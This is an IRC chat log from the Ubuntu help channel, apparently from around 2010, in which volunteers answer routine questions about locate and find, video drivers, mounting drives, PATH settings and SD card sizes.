dweezahrizmitti use safe vga mode18:13
dweezahri thought f6 when installing18:13
izmittti configure paramater vga=771 i didnt work18:13
dweezahryou are installing from cd?18:13
dweezahryou choose english or your language, then press f6 are there vga options?18:14
econdudeawesomehowdy! I'd like to add a recursive functionality to updatedb. Does it already do this?18:14
izmitttthere are some options18:14
lunavoraxOk thanks I'll do this from a live cd18:14
izmittti checked it fworked when installing but after installation ubuntu didnt begin18:15
dweezahrstill not working?18:15
kyenteiHey guys, the current themes are boring me. Does anyone have a suggestion of a good theme? I want it to be basic, simple and not (too) dark.18:15
dweezahrwhat hardware are you running?18:16
lunavoraxok i'm off trying to recover my files18:16
lunavoraxthank you very much !18:16
dweezahrkyentei use ultimate edition18:16
dweezahrdiffrent themes18:16
rikkimaruso i appear to have deleted the MBR off my sd card. fdisk and windows can't tell how many sectors/tracks there are. Does anyone know how to fix this?18:16
thune3econdudeawesome: what do you mean, recursive functionality, in the context of updatedb?18:16
kyenteidweezahr: I'm not looking for another OS, I'm looking for another theme.18:16
izmitttcore2duo intel,ati radeon xpress 1250,1 gb ram18:16
dweezahrthen you can go to art.gnome.org18:17
izmitttcore2duo intel,ati radeon xpress 1250,1 gb ram18:17
econdudeawesomethune3 -- I have a separate partition where I keep all my data files, under /media/data. I am unable to find files on this drive using the locate command18:17
frank_ist jemand aus Deutschland da ?18:17
xiaode Someone will speak Chinese18:17
theadminfrank_: Besuchen Sie #ubuntu-de, bitte. Vielen Dank!18:18
llutzecondudeawesome: check /etc/updatedb.conf for pruned-fs18:18
kyenteidweezahr: Thanks.18:18
jadams_I see desktop couch running, but where can I see the default couchdb administrative interface in ubuntu?  localhost:5984 yields nothing, but that seems to be where it's supposed to be running it i look in /etc/couchdb18:18
dweezahrtrying this on vmware18:19
econdudeawesomellutz I only see prunefs, but no pruned-fs18:19
econdudeawesomellutz is this what I need to add to correct the problem?18:19
llutzecondudeawesome: those or PRUNEPATHS18:20
izmitttcore2duo intel,ati radeon xpress 1250,1 gb ram18:20
jadams_where does my couchdb admin interface live?  I see nothing on localhost:598418:20
thune3econdudeawesome: PRUNEPATHS has /media  in the "blacklist" because /media is very active18:20
llutzecondudeawesome: most likely /media is listed in PRUNEPATHS18:20
thune3econdudeawesome: you should mount permanent partitions in /mnt18:21
econdudeawesomellutz & thune3 yes, /media is in there. Do I need to remove it then?18:21
llutzecondudeawesome: yes18:21
thune3econdudeawesome: i would say no18:21
econdudeawesomethune3 I am fairly sure I did this--how would I check?18:21
dweezahr<izmittt> try nomodeset18:21
llutzecondudeawesome: that will add all stuff from every media mounted to /media/xxx to your db. if you want that...18:21
HideMeDeathspawn, Worked perfectly, thanks.18:22
econdudeawesomellutz that is what i am looking for.18:22
thune3llutz: that's my worry too18:22
john__i think i need to install proprietary video drivers18:22
econdudeawesomethune3 how would I check to ensure permanent partitions?18:22
john__for my system18:22
econdudeawesomellutz anyway I could just ensure /media/data is added?18:22
john__webpage is kind of sluggish18:22
DeselectHello all18:22
llutzecondudeawesome: better to mount your data-collection to /mnt as mentioned. less side-effects18:23
fearfulHey, my media buttons just randomly stopped working on Lucid HP laptop any ideas how to restart the buttons without having to fully restart?18:23
llutzecondudeawesome: create /mnt/data and change /etc/fstab accordingly18:23
econdudeawesomethune3 and llutz--would mounting through /mnt allow me to use the locate command on the parition?18:23
antivirteltheadmin ... I have a karmic mashine near here, I set it up in 2 mins, please wait <-- NOW it works, no errors18:23
dalicouild anyone help me, please. when i see movies from net on xubuntu are very slow what can i do? i already install flash18:23
llutzecondudeawesome: if /mnt isn't listed in PRUNEPATHS, yes18:23
theadmindali: Linux flash is bad, sorry :/ Not much we can help with18:24
dweezahrizmitt: type radeon.modeset=0 after quiet splash18:24
=== blockcold is now known as b0om
john__any ideas18:24
econdudeawesomellutz what do you think the potential sideeffects of using updatedb on /media is?18:24
b0omshowmount -e localhost18:24
b0omclnt_create: RPC: Program not registered18:24
theadminb0om: With what?18:24
DeselectI'm working on making a custom ubuntu distro, and I can't find any info on making one with a team, ie. revision control and hosting. I assume I can't just upload an entire extracted livecd onto sourceforge :-/18:24
b0omclnt_create: RPC: Program not registered18:25
dweezahrizmittt: type radeon.modeset=0 after quiet splash18:25
b0omtheadmin: help me18:25
llutzecondudeawesome: everything you mount to /media will be added to the locatedb  if updatedb runs. you don't want that18:25
b0omwhy this happening when i want to share ia directory for virtual host18:25
izmitttshould remove -- ?18:25
llutzecondudeawesome: because its mostly data, not present all the time. so false positives when using "locate"18:25
dweezahronly add at the end18:25
econdudeawesomellutz dang. No way to just add the specific file, note the entire partition?18:25
theadminlocate, locate, who needs it when you have find... :/18:26
trismjadams_: visit ~/.local/share/desktop-couch/couchdb.html18:26
unpersonI know it's possible to upgrade your distro version from the command line, and it's possible to upgrade your distro using an iso image of the alternate CD.  Is it possible to upgrade from the alternate CD image from the command line?18:26
Chuck27Whats the command you put in a terminal to check your cd burner?18:26
Deselectundecim: yes, just use apt18:26
llutzChuck27: cdrecord -prcap18:26
theadminunperson: Mount the CD and see, there are some scripts there for that IIRC18:27
undecimDeselect: errr... bad tab completion?18:27
Deselectlol yeah18:27
unpersontheadmin, Okay I'll have to look a little closer.  The only one I've found so far is cdromupgrade, which wants to connect to an X Server.18:27
econdudeawesometheadmin how does one use find and return a filepath18:28
john__are the linux drivers enough for graphic cards18:28
b0omi share a dirctory in virtualserver18:28
undecimDeselect: That was really freaky, because I was wondering about a problem I had with upgrades myself...18:28
theadminunperson: Try it with a --help flag, who knows18:28
b0omi want to mount it on my orginal desktop18:28
Deselectmaking a livecd is painstaking work18:28
b0omcan i share directory of virtualhost to my desktop pc ?18:28
theadminecondudeawesome: find DIRECTORY -iname 'filename', basically, will look in DIRECTORY and all subfolders18:28
jadams_trism, awesome, thanks.  What do I do if I want to write an app that interacts with couchdb and I need to know what port it's running on?  Because that's kind of odd to me....18:28
Deselectnothing works right in a chroot18:28
b0ombut showmount giving me error18:28
theadminecondudeawesome: find DIRECTORY -maxdepth 1 -iname 'filename' - this one without subfolders18:29
Deselectcan't even install TOR right18:29
econdudeawesometheadmin so if I wanted to find within the entire filesystem, I would put find / -iname 0000book.pdf, for example?18:29
theadminecondudeawesome: Not exactly, from what I recall the name has to be quoted18:29
theadminecondudeawesome: find / -iname '0000book.pdf'18:29
llutztheadmin: no18:29
walbert1hey folks, getting "Package linux-image-xen is not available, but is referred to by another package." on 10.04 server, trying to install the xen pv kernel.  What package should I be looking under?18:30
theadminllutz: Well you know better :D18:30
econdudeawesomellutz what is missing? locate seems like a nicer option since updatedb just runs in the background, so resultes are instantenous18:30
llutztheadmin: only wildcards have to be quoted18:30
john__are the linux drivers enough for graphic cards?18:30
theadminllutz: ...and names with spaces :/18:30
llutzecondudeawesome: create /mnt/data and change /etc/fstab accordingly18:30
trismjadams_: if you know any python, may want to check out how the gwibber code interacts with it. I haven't experimented with desktop-couch much yet18:30
llutztheadmin: and some other things yes18:31
llutzecondudeawesome: put your stuff there, done18:31
miked595what is the best way to convert mkv to an mp4 (ipod compatable)?18:31
b0omclnt_create: RPC: Program not registered18:31
b0omwhy i have this error ?18:31
econdudeawesomellutz fair enough. I think I'm sold on the find command tho, until I need to use regexp18:31
joeyeyecan someone help me diagnosing frequent gdm lock-ups18:31
pieroHi! I need a simple command line solution to convert the videos from my camera to a smaller file, no matter the video or audio codec. I don't want to worry about resolution, bitrate or anything else. But, some videos are 1024x800 and others are 640x480. What can solve my problem?18:32
theadminecondudeawesome: Find supports wildcards, unsure about regexes18:32
llutzecondudeawesome: locate and find have both some pro/cons18:32
trismjadams_: although I imagine they use the org.desktopcouch.CouchDB dbus interface and the getPort method18:32
dweezahrAnyone knows why uname -m gives me i686 on an x64 processor and x64 ubuntu?18:32
econdudeawesomellutz if I'm not becoming bothersome--what are they?18:32
llutztheadmin: reges too18:32
craigbass1976How do I get a .jsp file to open?  I just installed JRE, and I have this trouble every time I set up a new box.  I can't remember this time how I did it18:32
drphreshHow can I convert .avi to .mp4?18:32
jadams_trism, fair, I'm just using it from javascript and not sure if I have a means to query dbus from there18:33
theadminllutz: So something like this may work? find / -iname '[a-zA-Z]*'18:33
unpersontheadmin, That's got it.  I needed to use the --frontend option.  What's weird is that I swear I tried this before and it did that automatically.18:33
john__damn anybody listening18:33
llutzecondudeawesome: locate is faster because it just queries the database, find is more flexible etc.pp18:33
llutztheadmin: man find18:33
theadminllutz: The Linux computer is off, can't ssh there :/18:33
miked595craigbass1976: isn't jsp different from javascript18:33
unpersontheadmin, I think the problem may be that this time I accidentally connected with X forwarding enabled.  I thought that setting the display variable to blank would be good enough, but apparently not.18:33
econdudeawesomellutz fair enough18:34
llutztheadmin: google man (gnu) find18:34
thune3econdudeawesome: my most common use is just : find . -iname "*whatever*"18:34
craigbass1976miked595, is regular java18:34
b0omlol i am not trolling18:34
econdudeawesomethune3 sudo find / -iname 'filename' worked excellently18:34
drphreshHow do I convert .avi to .mp4?18:35
theadminllutz: Uh, got it, the -regex flag. Find is kinda weird with one-dash and longer-than-one-letter options :D18:35
thune3econdudeawesome: bracketing with * never hurts18:35
miked595drphresh: i'm looking for something simular mkv to mp418:35
econdudeawesomealright! I've caused enough dissention among the ranks of the Ubuntu masters. I will answer drphresh and be on my way18:35
asymptoteI'm unable to watch world cup highlights on the FIFA site. Can anyone view them in firefox?18:35
rumbertcraigbass1976: miked595, gets translated on server side to java, generates 'whatever' for client, AFAIK.  When client sees it, it could have javascript in it.18:36
dweezahrinstall flash or realplayer18:36
asymptotedweezahr: I do have flash installed18:36
venikcan I send files using pidgin under gnome?18:36
craigbass1976I'm wondering if there's somethign else I'm supposed to do once I installed JRE...18:36
theadminvenik: Yes. Not on all protocols though, some don't support that from what I heard18:36
rumbertvenik: sure.18:36
econdudeawesomedrphresh see http://ubuntuforums.org/showthread.php?t=37a8059, comment 418:36
venikwhen I drag a file to the chat window, I am asked if I want this to become the icon for that budyd18:36
econdudeawesomethat is the command to do it in the command line--the manual can help you from there18:37
kermiti see a window option for 'always on top'.. is there a way to do 'always on bottom' ?18:37
theadminvenik: Choose "Send image file"18:37
RickyWhhow can I tell if my server is under a ddos attack?18:37
dweezahrRickyWh: difficult18:37
venikthe SEND FILE item is grayed out in the CONVERSATION menu18:37
dweezahrRickyWh: you need to check how many requests per second you have18:37
econdudeawesomedrphresh good luck!18:37
=== Farkie is now known as Farkie[Away]
venikwhere do I find: send image file?18:37
dweezahrRickyWh: If this is far above average, you have a problem18:37
theadminvenik: What protocol are you trying this on?18:37
RickyWhdweezahr, which file can I find that in?18:38
tucemiuxwhat's the utility that allows you to choose the default os ?18:38
=== NG_ is now known as ng_
theadmintucemiux: There is startupmanager for GRUB configuration18:38
dweezahrRickyWh: apache?18:38
venikwhatever protocol pidgin uses for gtalk18:38
jenspHey there, I'm running Ubuntu Netbook Remix 10.04, after upgrading just now, the NetworkManager applet is missing, any ideas what I could have done wrong?18:39
RickyWhdweezahr, yes18:39
venikjabber or X...something18:39
theadminvenik: Hrm, xmpp. That definetly supports file transfer...18:39
tucemiuxtheadmin, how do did you remember, you use startupmanager a lot? O_o18:39
theadminvenik: Get the latest Pidgin from their site, www.pidgin.im18:39
venikso why is it grayed out?18:39
theadmintucemiux: Hey, I remember lots of stuff :D18:39
dweezahrRickyWh: check httpd.conf18:39
dweezahrRickyWh: and then see where the log files are located18:39
RickyWhi cannot even ssh in right now18:39
venikI am using pidgin 2.6.6 under gnome (10.04)18:40
tucemiuxtheadmin, i installed and used it once but then i forgot the name of the app, I was just wondering if there was a trick to remembering this stuff that you only use once and then never again until the next full moon18:40
dweezahrRickyWh: then it can be hacked, small chance tough18:40
dweezahrRickyWh: can you reach it in the real word, can you reset it?18:40
RickyWhdweezahr, no18:40
theadminvenik: The latest is 2.7.1 or something. Get it from their site. Not a big deal since they provide a package which also adds a repo for automatical updating18:41
dalicouild anyone help me, please. when i see movies from net on xubuntu are very slow what can i do? i already install flash18:41
BitEncrypt311 FPS!18:41
theadmindali: You can complain to adobe18:41
daliisnt' browser more fasters?18:42
amokpauleHello, when im watching a series on dvd and an episode ends or sometimes when my sata dvd writer is not used it seems it unmounts itself. Can someone plese tell me where that is related to or how to remount it.?18:42
BitEncryptso whats up peeps18:42
Kauzmik1drIm using Ubuntu 10.04. I had netatalk  and avahi working for afp server. I was doing a big transfer and it crashed. I used : sudo aptitude install -f [program] to try and fix it. It did not work, any ideas?18:42
theadminKauzmik1dr: sudo apt-get -f install18:42
theadminKauzmik1dr: FIRST the flags, THEN the operation :P18:42
Kauzmik1drthanks..Ill try it now18:42
john__are the drivers that ubuntu comes enough for the Ati Radeon 9800pro18:43
duffydackjohn__, they are all you are going to get.. yes they are reasonably fast also18:43
venikthe very same protocol used to work with file transfers under KDE18:44
theadmintucemiux: You know, when you reformat the HDD and do a clean install every 6 months remembering what programs you use becomes trivial18:44
venikto the same people18:44
=== bo is now known as Guest32479
venikI am updating pidgin-- let's see if that helps18:44
sharperguyCan anyone help me with skype? My microphone seems to work with sound recorder and audacity, but all I get in skype test call is white noise.18:45
john__what can i use to open .bin files18:45
theadminjohn__: Those can be anything :D What is the file?18:45
p1l0tError Opening '/dev/sr0': No medium found18:46
Pirate_HunterI can't seem to run ifconfig in lucid as my normal user without using sudo, error output: Command 'ifconfig' is available in '/sbin/ifconfig' The command could not be located because '/sbin' is not included in the PATH environment variable, any ideas?18:46
ActionParsnipjohn__: mark them as executable with chmod +x18:46
john__i tried that didnt work18:46
john__chmod +x then filename.bin18:46
theadminjohn__: Supposedly what is the file? A program?18:46
llutzPirate_Hunter: add /sbin to your path18:46
ActionParsnipjohn__: then you need to use ./file   so the interpretter looks in the pwd18:46
whileimhereHi I have an extra wireless router from Verizon. They sent me a new one recently. The old one worked fine. Is there a way to use the second one to act as a repeater ?18:47
ActionParsnipjohn__: ease up on the enter key dude18:47
llutzPirate_Hunter: or just call it with full path /sbin/ifconfig18:47
dalithe browser midori is better than firefox?18:47
VirtualFriendAnyone can tell what is Keyring?18:47
p1l0tWhen I type "sudo mount -t ntfs /dev/sr0 /cdrom" I get this: Error Opening '/dev/sr0': No medium found... any ideas18:47
b0omhow to start selinux in ubuntu ?18:47
ActionParsnipjohn__: if you change directory to the directory containing the file then use ./filename18:47
asymptoteI'm unable to watch world cup highlights on the FIFA site. Can anyone view them in firefox?18:47
SlidingHornjohn__:  open your terminal and type ./path/to/bin/file18:47
theadmindali: There is no "better" or "worse". It all depends on your personal prefference.18:47
ActionParsnipjohn__: replace filename with the actual name of the file18:47
SlidingHorn!best | dali18:48
ubottudali: Usually, there is no single "best" application to perform a given task. It's up to you to choose, depending on your preferences, features you require, and other factors. Do NOT take polls in the channel. If you insist on getting people's opinions, ask BestBot in #ubuntu-bots.18:48
theadminSlidingHorn: That ain't work like this, it's either /path/to/file or ./filename18:48
b0omp1l0t: your cd drive not working18:48
b0omhow to start selinux in ubuntu ?18:48
ActionParsnipdali: its certainly lighter and faster but is less feature rich18:48
shazkhanhi ppl18:48
Pirate_Hunterllutz, how do I actually add it to my path and I never had to do this before, hmmm...18:48
theadminb0om: Selinux is a bootloader... you don't "start" it.18:48
p1l0tIt was working before I upgraded...18:48
llutzPirate_Hunter: look at ~/.profile18:48
john__bash: no such file or directory18:48
shazkhancan anyone explain howto make intrd for my ubuntu that I run on my laptop18:48
b0omtheadmin:  getsebool |grep autofs18:48
maszlothis seems like it would be a simple task but am a little lost.  I have a remote server that I have enabled remote desktop which I set to tunnel in on SSH.  can connect fine, issue is I forgot to check the option to allow the remote to take control of the desktop, I am looking for where this conf file is located but not having any luck.. please help18:48
b0omgetsebool:  SELinux is disabled18:48
john__im looking in the dir18:49
ActionParsnipjohn__: ok lets make this really easy, what is the EXACT name of the file and where is it stored?18:49
SlidingHornjohn__:  it's been asked like 3 times, could you please tell us what file you're trying to open...and if you say "it's a bin file" we're going to get upset18:49
p1l0tB0om I tried another cd and it said read-only file system18:49
theadminTelling us the mimetype would be a better idea :D18:49
llutzPirate_Hunter:if no PATH is set there,  add something like:       export PATH="$PATH:/sbin:/usr/sbin/"18:50
john__exact name is ati-driver-installer-9-3-x86.x86_64.run18:50
ActionParsnipjohn__: and what folder holds the file?18:50
theadminjohn__: it's not a .bin, it's a .run :P18:50
b0omp1l0t: so that your cd drive is working :D18:50
ActionParsnipjohn__: cd ~/Downloads; chmod +x ./ati-driver-installer-9-3-x86.x86_64.run; ./ati-driver-installer-9-3-x86.x86_64.run18:50
theadminjohn__: chmod +x ~/Downloads/ati-driver-installer-9-3-x86.x86_64.run && ~/Downloads/ati-driver-installer-9-3-x86.x86_64.run18:51
theadminActionParsnip: Dammit, yours is shorter18:51
asymptoteI'm unable to watch world cup highlights on the FIFA site. Can anyone view them in firefox?18:51
ActionParsniptheadmin: thats what SHE said!!18:51
theadminActionParsnip: :P18:51
AndIrc_hello all w know...hen ubuntu is available for ego 4G please let me18:51
Pirate_Hunterllutz, weird I am logged into my server box and comparing the both I dont see why this one would be different both .profile are the same yet on the server box I can call ifconfig just like that, will try what you suggested18:52
dahudSo to mount a monitor, I must start up Nvidia X Server Settings, detect new monitors, set the new monitor to TwinView, Apply, and exit.  Is there a faster way?18:52
xangua!ot | asymptote18:52
ubottuasymptote: #ubuntu is the Ubuntu support channel, for all Ubuntu-related support questions. Please use #ubuntu-offtopic for other topics. Thanks!18:52
p1l0tB0om Yeah I guess so :) but then how do i mount a read-only file system? --force? lol18:52
tucemiux AndIrc_ this is the wrong channel, you dont put ubuntu in the evo, you put android18:52
simarActionParsnip, I have forget my password of my nickname in IRC which i uesd to use in a previous corrupted installation of ubuntu about a month ago... Now I can't identify my nickname .. it says nickname is registered ...  is there a way out ???18:52
asymptotexangua: it's not offtopic please don't be rude18:52
john__just brings me back to blank downloads dir18:52
tucemiuxAndIrc_, go to #ppcgeeks18:52
ActionParsnipAndIrc_: its available now dude18:52
joeyeyecan someone help me diagnosing frequent gdm lock-ups ?18:52
llutzPirate_Hunter: there are other files where PATH could be set. /etc/profile, /etc/environment, /etc/bashrc etc.18:52
ActionParsnipsimar: ask in #freenode   they sort our IRC passwords18:53
dweezahrCan someone help me with my problem?18:53
tucemiuxjoeyeye, is it a desktop or laptop?18:53
dpI've got a package saying that some file it's trying to overwrite is in another file; is there a way to force this action, instead of dieing?18:53
rolandpishHi. I'm using Ubuntu Lucid. Is there some way to decrease the amount of video memory? (In my BIOS there is no such option, so maybe some command in Ubuntu)18:53
joeyeyetucemiux, it's a desktop (dell gx620)18:53
llutzPirate_Hunter: but for personal changes, ~/.profile or ~/.bashrc are the files to change18:53
tucemiuxjoeyeye, did you just recently installed ubuntu on it and it locks up or was it a working system and now its starting to lock up ?18:54
ActionParsniprolandpish: its defined in the BIOS dude, maybe an updated BIOS will have the option18:54
AndIrc_want to run ubuntu on ego 4G18:54
john__it was uncompressing then....Error: ./default_policy.sh does not support version18:54
john__default:v2:i686:lib::none:2.6.32-22-generic-pae; make sure that the version is being18:54
john__correctly set by --iscurrentdistro18:54
indian_munndacan anyone tell me how can i get to know whether my machine is 64 bit or 32 bit?18:54
Pirate_Hunterllutz, wasn't ware so one of those file is either missing or has changed, ok no problem at least I now have a lead, thanks do I have to log out before the changes in .profile is detected18:54
tucemiuxAndIrc_, that is offtopic18:54
llutzPirate_Hunter: yes, relogin or ". .profile"18:55
simarActionParsnip,  No channel joined. Try /join #<channel>  This is what comes ?????18:55
shazkhancan anyone state the initramfs command to generate initrd for my new kernel?18:55
maszloDoes any one know where vnc server (remote desktop) saves its config files?18:55
joeyeyetucemiux, everything was fine on Jaunty, Karmic  - I'm on Lucid now and ever since that update I crash at least 2-3 times/day18:55
Pirate_Hunterllutz, thanks will do18:55
ubottuTo install Flash see https://help.ubuntu.com/community/RestrictedFormats/Flash - See also  !Restricted and !Gnash18:55
ActionParsnipindian_munnda: uname -m18:55
ActionParsnipsimar: /j #freenode18:55
amokpauleHow can i find out what the name is ubuntu gives my sata dvd writer?18:55
ActionParsnipindian_munnda: i686 == 32bit   x86_64 ==64bit18:56
simarActionParsnip, Thanks18:56
ActionParsnipamokpaule: sudo lshw -C disk18:56
Nixlozhi slow-motion18:56
dweezahrActionParsnip: I am running x64 on x64 cpu, but uname -m shows i686, do you know why?18:56
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tucemiuxjoeyeye, it could be some module that's making it crash, if that's the case I cant help you much other than tell you to look at the logs /var/log/dmesg and I suppose there's a bunch of other logs which I dont know about18:56
ActionParsnipdweezahr: you installed the 32bit ISO dude18:56
john__any ideas ActionParsnip18:57
erUSULdweezahr: becuse you are actually running 32 bits on a 64 bit machine18:57
rolandpishActionParsnip: thanks. I updated the BIOS to its latest version, and found no Ubuntu command or configuration to change that. My system is 4GB and the video memory is 1GB (too much for me).18:57
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amokpauleis it normall that it has like 6 different names?18:57
joeyeyetucemiux, thanks. I've scanned all the logs and can find no culprit ... really frustrating18:57
ActionParsnipjohn__: no idea dude, i dont use ati card18:57
ActionParsnip!ati | john__18:57
ubottujohn__: For Ati/NVidia/Matrox video cards, see https://help.ubuntu.com/community/BinaryDriverHowto18:57
tucemiuxjoeyeye, it could also be hardware, it could be your hard drive or it could be your motherboard, I would clean the motherboard first just to see if it likes it, try running lucid on a live CD and see if it locks there as well18:57
slow-motionhi Nixloz18:57
dpI've got a package saying that some file it's trying to overwrite is in another file; is there a way to force this action, instead of dieing?18:57
toyman61I'm trying to listen to a webcast from SANS.org using the ElluminateLive! software. But after checking my computer environment I try to start the archived webcast, but the only thing I get is a JNLP-file. What shall I do ?  Ubuntu 10.04 64-bit18:57
john__know why i got that error?18:57
indian_munndathanks ActionParsnip my machine is i686.18:58
dweezahrActionParsnip: negative18:58
dweezahrerUSUL: negative18:58
Chriistihow run safari browser on ubuntu?18:59
erUSULdweezahr: we will have to take your word for it and ignore the evidence then18:59
ActionParsnipChriisti: you can use the windows verion in wine18:59
tucemiuxjoeyeye, does it lock up randomly or consistently?18:59
toyman61How to run a JNLP-file on Ubuntu 10.04 ?18:59
amokpauleActionParsnip, ty19:00
joeyeyetucemiux, totally random... sometimes I can get back in with ssh and restart gdm, other times I can not19:00
ActionParsnipWhy does gmail-notify ALWAYS have a background? Is there a way to change it?19:00
makaveli0129anyone that can help i insert a flash drive and all i get in that i am not privileged to mount it any ideas?19:01
CaptainTrekmakaveli0129:  you arent admin then, or someone set permissions to prevent mounting of media for users19:02
tucemiuxjoeyeye, it sounds like a module somewhere is crashing if you can still login through ssh, try running lucid using a live CD, you can also try installing karmic, jaunty made my desktop cry and  I skipped it altogether until karmic was released, I wont be installing lucid on my desktop until I feel there's a feature in lucid that I just must have19:02
ActionParsnipmakaveli0129: check there isnt an entry for it in /etc/fstab19:02
makaveli0129captainTrek: how can i find out the /dev or whatever the flash drive is so i can mount as root19:02
erUSULmakaveli0129: can you paste what does "id" return for you ? (run it in a terminal )19:02
ActionParsnipmakaveli0129: sudo lshw -C disk19:02
ActionParsnipmakaveli0129: as well as: sudo fdisk -l19:03
makaveli0129erusul: uid=0(root) gid=0(root) groups=0(root19:03
joeyeyetucemiux, good advice. I was happy with Karmic and Jaunty ... perhaps I should just go back19:03
erUSULmakaveli0129: you are logged us root ?19:03
makaveli0129erusul: sorry this is it : uid=1000(jr) gid=1000(jr) groups=4(adm),6(disk),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(jr)19:03
Nixloz<ActionParsnip> https://bugs.launchpad.net/ubuntu/+source/gmail-notify/+bug/54890519:03
erUSULmakaveli0129: ok; you are part of plugdev so i see no problems there ...19:04
Guest70906hello i have a pentium 4 machine im trying to trough ubuntu 7.04 on and i have a very low resoltion monitor i tried to use to options for resoulutions but none of them work the only one that works is 800-600 and that doesnt even work after the loading splash completes none of them work i dont know my res but 98 seemed to work fine with the monitor19:04
makaveli0129erusul: yea it worked fine i don't know what is causing it now19:04
tucemiuxjoeyeye, you can also search the forums and search for your hardware, if you find a bug related to your hardware i suggest you open a bug report yourself, eventually it could be fixed19:04
TraintopHi Folks!19:04
Nixlozhi Traintop19:05
ActionParsnipNixloz: cheers duder :)19:05
projekt2hi Traintop19:05
Nixloz<ActionParsnip> you're welcome19:05
makaveli0129ActionParsnip: tried the lshw and the flash drive doesn't show19:05
xanguaGuest70906: 7.04 is no longer supported, why do you want to use such an old version¿19:05
ActionParsnipmakaveli0129: does it show in the fdisk output?19:06
Guest70906thats what i got on hand at the moment19:06
* p1l0t *faceplant* aparently DVD's don't work in my CD-ROM... and here I am trying to modify fstab to make it work...19:06
Guest70906all my others are at the other house19:06
makaveli0129ActionParsnip: i don't see it there hold on i'll send you a message with the output since it will be to much on here19:06
TraintopI have question about teamspeak3; I had ubuntu 9.10 installed on my old pc and when I used the old hard disc in the new one, my complete ubuntu-install worked right out-of-the-box19:06
ActionParsnipp1l0t: if it has a DVD read or write of both capability it will read them etc19:06
Traintopbut teamspeak did not work the mix to work...19:07
p1l0tActionParsnip, nah this thing came out before CD-Rs were affordable19:07
Guest70906i could go out and buy some cdr's19:07
ActionParsnipp1l0t: then it won't be able to read dVDs if it doesn't have the right laser, no amount of coding will make it read DVD19:07
makaveli0129ActionParsnip: nevermind it did show it has /dev/sdc so to mount would just be sudo mount /dev/sdc /media/test right?19:07
ActionParsnipmakaveli0129: o, /dev/sdc is the device, /dev/sdc1 is the partition, you mount partitions, not drives19:08
p1l0tHehe yeah I figured19:08
ActionParsnipmakaveli0129: sounds like the data is corrupted. Have you been safetly removing the stick EVERY time you use it?19:08
makaveli0129ActionParsnip: prolly not19:09
nks-I just installed fglrx and rebooted, and now I'm unable to get an IP with dhclient (I have not changed any network settings), tried to remove fglrx but it still doesnt work19:09
makaveli0129ActionParsnip: i just reformatted it on a windows machine19:09
Guest70906isnt there a command tho to manually set your res on the install or live install19:09
ActionParsnipmakaveli0129: then thats why, your abuse of your hardware has damaged the data19:09
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llutzActionParsnip: you mount filesystems, not partitions </nitpick> ;)19:09
makaveli0129ActionParsnip: the data isn't important i just want to use it LOL19:09
celeritashas anybody used hamachi on ubuntu?19:09
xloosescrewxI am new to ubuntu.  I downloaded  adobe flash, but cant seem to get it to work.  could anyone help please.19:10
makaveli0129ActionParsnip: what the code to mount it?19:10
SlidingHorn!flash | xloosescrewx19:10
ubottuxloosescrewx: To install Flash see https://help.ubuntu.com/community/RestrictedFormats/Flash - See also  !Restricted and !Gnash19:10
Guest70906celeritas: i have used it on vista worked like a charm19:10
ActionParsnipmakaveli0129: you must remember to safetly remove devices or the data will be arbaged19:10
Nixloz<makaveli0129> then just format it with something like gparted?19:10
xloosescrewxok thanks19:10
xanguaxloosescrewx: sudo apt-get install flashplugin-nonfree , you can also install it from the parthenr repository19:10
ActionParsnipmakaveli0129: you could try testdisk to write a partition table to the device then fsck it, Sounds bad though19:10
ActionParsnipmakaveli0129: if the data is disposable then just fire up parted and repartition and reformat the new partition19:11
celeritasGuest70906, i am trying to setup synergy over hamachi for my laptops and i used hamachix for my mac. all i need is setting up on ubuntu. i found a good tut but before i start, i wanted to know how responsive it is on ubuntu19:11
rikkimaruwhat reasons could there be for fdisk showing my sd card having a smaller size than it actually does? (http://pastebin.ca/1883035 for a 4GB card)19:11
xloosescrewxok thanks again19:12
celeritasrikkimaru, multiple partitions on card?19:12
Guest70906but again theres no res comands19:12
Nixloz<rikkimaru> unused space on the disk?19:12
cousteauwhy was sun-java6 dropped to the partner repository? I can't find any page about that19:12
Traintoprikkimaru: "4GB" == 4.000.000 bytes, but fsdisk uses 1024 as multiplier different to the 1000 used by drive-producers19:12
makaveli0129ActionParsnip: it won't let me format as ntfs19:13
Guest70906ill figure it out peace19:13
makaveli0129ActionParsnip: it's grayed out for some reason19:13
LasivianI have a 52" LG TV connected to my HDMI port, I have video in gnome and the resolution looks right but it's "too big" as if the video is 56" not 52", and i'm curious how I can fix that19:13
celeritasTraintop, rikkimaru, i thing -h does the human number trick19:13
Nixloz<makaveli0129> that's either when the partition is mounted, or you have to install ntfstools19:13
Traintopceleritas: no, its a labeling-problem of the vendors19:13
Traintopwhen write 1GB, they mean 1000 MB== 1.000.000 kB, and so on19:14
rikkimaruTraintop, well.. it's only showing 512KB, so i don't think its that19:14
celeritasTraintop, oh i understand. didn't know they did that though19:14
Traintopbut linux and windows disc-labels use: 1024 as the multiplier, so 1GB=1024MB=1024*1024kB and so on19:15
rikkimaruceleritas, there aren't any partitions on the disk (as far as fdisk can tell)19:15
Nixloz<rikkimaru> have you tried looking in gparted?19:15
makaveli0129ActionParsnip: gparted is giving me an "unrecognised disk label" error19:15
rikkimaruNixloz, yep, shows 512 KB19:15
Traintopso a 4GB disc really is 3.6GB disc19:15
ActionParsnipmakaveli0129: install ntfsprogs19:15
Traintopthey just get higher numbers :-)19:15
celeritasrikkimaru, do other operating systems show the card correctly?19:15
rikkimaruTraintop, You're talking about kilobytes vs kebibytes etc19:15
rikkimaruceleritas, nope19:15
Nixloz<rikkimaru> then the drive may actually be damaged...19:15
ActionParsniprikkimaru: it may be corrupted, fsck the device19:16
blueMOND4Yso no-ones talking ;O19:16
PigeonCluster<Roasted> what is cinnamon?19:16
thune3rikkimaru: what command gave you that output?19:16
celeritasrikkimaru, check the partition table on the sd card, maybe only a section was formatted, leaving unused space19:16
blalbhello. I've butchered my window manager. do you know how I can restore the defaults without reinstalling everything?19:16
rikkimaruActionParsnip, it's FAT19:16
rikkimaruthune3, fdisk -l19:16
blalbim running ubuntu netbook edition19:16
Traintoprikkimaru: yes, but I don't like the new abbrevations either... the old way would have worked if people were just a bit more aware of this19:16
ActionParsniprikkimaru: not the most robust file system, you can fsck fat partitions19:16
rikkimaruceleritas, fdisk doesn't show any partitions, where else can i check?19:17
ActionParsnipblalb: press ALT+F2 and run:  metacity --replace    should be ok19:17
rikkimaruActionParsnip, fsck.vfat "Logical sector size is zero."19:17
